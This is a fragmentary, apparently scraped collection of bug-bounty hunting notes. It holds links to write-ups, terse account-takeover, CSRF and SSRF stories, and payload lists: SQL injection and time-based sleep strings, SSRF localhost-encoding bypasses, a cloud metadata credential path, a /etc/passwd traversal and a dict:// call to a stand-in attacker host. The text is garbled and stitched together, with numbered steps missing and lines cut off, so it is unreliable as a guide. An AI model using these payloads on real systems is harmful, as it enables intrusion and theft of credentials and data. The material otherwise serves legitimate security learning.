By
https://link.medium.com/OVvYaKLng3
https://link.medium.com/HZpTPtR2F3
https://link.medium.com/bpYhuYR2F3
https://link.medium.com/5PnwoRS2F3
https://link.medium.com/A67jqlT2F3
https://thezerohack.com/hack-instagram-again
https://ninadmathpati.com/how-i-was-able-to-earn-1000-with-just-10-minutes-of-
bug-bounty
https://link.medium.com/MgdJoyY2F3
https://link.medium.com/iRVWjs02F3 https://link.medium.com/roeUih12F3
RCE story
http://1.site.com/admin
Forbidden
Main part
Successful takeover
Story of SSRF
1. Site was having article where user can comment so simply I used <h1> tag
for test - Success.
2. Chain time
- Generated CSRF poc of E-mail change and removed csrf token from it and
pasted that code in comment
3.Button created in comment.
Click
Validation vulnerability
site.com/emailid=admin@site.com&verified=false
Tip: While hunting 1st use website as normal user and understand each
function,Then hunt
Information disclosure:
1. Site having large scope so I thought lets test for DL
2. Used Google Pentest Tools for DL
3. Found multiple directory in the last there was config folder containing
data.yaml file
4. That file was disclosing Jenkins credentials
$xxxx for mini recon
2. It means it was showing my API key so I just tried to change username like
aditya.bug to my another username and boooom keys are shown in json
Redirection bypass
1.http://1.Site.com/action/raw_user?uri=
Bypassed successfully
I used ° to override keyword for bypassing where function is to blacklisting
first few keywords
Recon gawd
https://medium.com/@corneacristian/top-25-idor-bug-bounty-reports-ba8cd59ad331
https://hailstorm1422.com/linkedin-blind-idor
https://victoni.github.io/changing-userID-leads-to-data-leak
https://medium.com/bugbountywriteup/vimeo-livestream-bug-bounty-writeup-13fd208b5f4f
$$$$+$$$ Bonus
4. 302 redirect
3.I used that encoding for bypass and lastly :80 port scan
3.0x7f.0x0.0x0.0x1/administrator/dashboard
Delete bypass
"delete: true"
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
3. Pass null chars in token value so function will over-ride (submit 2 times)
5. 2FA disabled
1. Sign in to website
3. Now logout and observe the logout request (mine was azure services)
4. Parameter : logout_path=
I used dict://evil.com:80
What is dict ?
3. Same site having android app > Created account using same mail id but
different password
Comment deleted
Exploit:
2 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-
part-two/
3 - https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-
part-three/
Surface: https://github.com/kelbyludwig/saml-attack-surface
Examples:
- http://secretsofappsecurity.blogspot.com/2017/01/saml-security-xml-external-entity-
attack.html
- https://seanmelia.wordpress.com/2016/01/09/xxe-via-saml/
- https://hackerone.com/reports/136169
account takeover
1. 1 account logged in 2 browsers
2. Tried signup with same account but showing email exist and redirect to signup page
3. In Firefox captured request of sign up submit >Do intercept > Response > Email exists
Note: I didn't mention some things because I want you to implement your logic and do it by yourself.
RCE reports
1. https://hackerone.com/reports/591295
2. https://hackerone.com/reports/470520
3. https://hackerone.com/reports/181879
4. https://hackerone.com/reports/351014
5. https://hackerone.com/reports/658013
6. https://hackerone.com/reports/403417
7. https://hackerone.com/reports/631956
SSRF write-ups
https://medium.com/a-bugz-life/exploiting-an-ssrf-trials-and-tribulations-14c5d8dbd69a
https://medium.com/@michan001/ssrf-on-pdf-generator-36b81e16d67b
https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-
stackdriver/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://medium.com/@pflash0x0punk/ssrf-via-ffmpeg-hls-processing-a04e0288a8c5
https://kntx.xyz/Blind-SSRF-due-to-Sentry-Misconfiguration/
https://jin0ne.blogspot.com/2019/11/bugbounty-simple-ssrf.html
https://openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
https://evanricafort.blogspot.com/2019/08/ssrf-vulnerability-in.html
https://medium.com/@androgaming1912/gain-adfly-smtp-access-with-ssrf-via-gopher-
protocol-26a26d0ec2cb
6. On manual observation found basic console button under that php files > Click > Yooo
2. site:http://site.com intitle:index.of
Account takeover
Function: You can reset link to email or phone
Hidden Parameters:
Time based
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1--
OR 1=0--
OR x=x--
OR x=y--
HAVING 1=1
HAVING 1=0
HAVING 1=1#
HAVING 1=0#
HAVING 1=1--
HAVING 1=0—
#onliner to extract endpoints from JS files of a given host #BugBountyTips
Wrapped present
https://gist.github.com/gwen001/0b1571
1. Go to report section
5. Format :- aditya-1.txt
4. "/user/local/redacted/../../../etc/passwd" -> OK
Token
.json
js
File
SQL
key
path
verify
false/true
https://link.medium.com/tKqQY1Ml05
https://link.medium.com/ne4pwoOl05
https://link.medium.com/hhdBnCPl05
https://link.medium.com/YFLGk4Ql05
https://link.medium.com/rml43ESl05
https://link.medium.com/ds1k5XTl05
https://link.medium.com/35IjaPVl05
https://link.medium.com/4l50R4Xl05
Unauthorized access to event mgt system:
Function- You can create public or private invents
1. site. com/xyz/username?view=current_events
3. Able to just view title, date created and event owner name
Tip: Always add headers to bypass single based verification on sensitive action.
P2 marked as P1
https://hackerone.com/reports/514224
https://hackerone.com/reports/793704
https://kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-
Consul.html
Resource to learn:
https://github.com/cujanovic/SSRF-Testing
Tips : Smuggler
Tip: If you found any password on github but program isn't accepting data from github or any
third party try to look password in your target only .
Example:
Password:"aqwsed123"
Simple Google dork
SSRF payloads
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ http://192.168.0.1
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1
HTTP
ssrf.php?url=http://127.0.0.1:22
ssrf.php?url=http://127.0.0.1:80
ssrf.php?url=http://127.0.0.1:443
Sentry Blind SSRF
(https://hackerone.com/reports/374737
/https://medium.com/@0ktavandi/blind-ssrf-in-stripe-com-due-to-sentry-
misconfiguration-60ebb6a40b5)
2. Burpsuite
3. Send it to Repeater
Got LFI..
1. File Upload with URL
2. Put file:///anything
4. Wait..Check Response and Got Content of Local File in Response when checked in Burp..
SSRF
Host: http://target.com
X-Forwarded-For: http://collaborator.net
Note:
Remaining : Google it
2.Spider whole application with burp only + tools for automation check
4. uri= found
5. uri=//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ Always search for keywords
in burp and take help of wayback to validate
@1ndianl33t
While hunting for subdomain takeover check your target with following
flow.
http://target.com
http://target2.com
Change numericals
Description :
2. Saw that there was no state parameter in the URL. State parameter act as CSRF token.
4. Drop the request . As token may validate if used once so better to drop it.
Resources to learn:
This was enough for me learning and exploiting the above:
https://youtu.be/996OiexHze0
Burp suite search keywords:
uri=
url=
key=
.json
oauth
redirect=
api
dashboard
config.
=http
&api
@ (for user based URL for ssrf)
dir
file
php_path
page
data
val
root
?q
?query
Token
You may need to perform it for more time. Until you get dos response. 1st
check the version of confluence,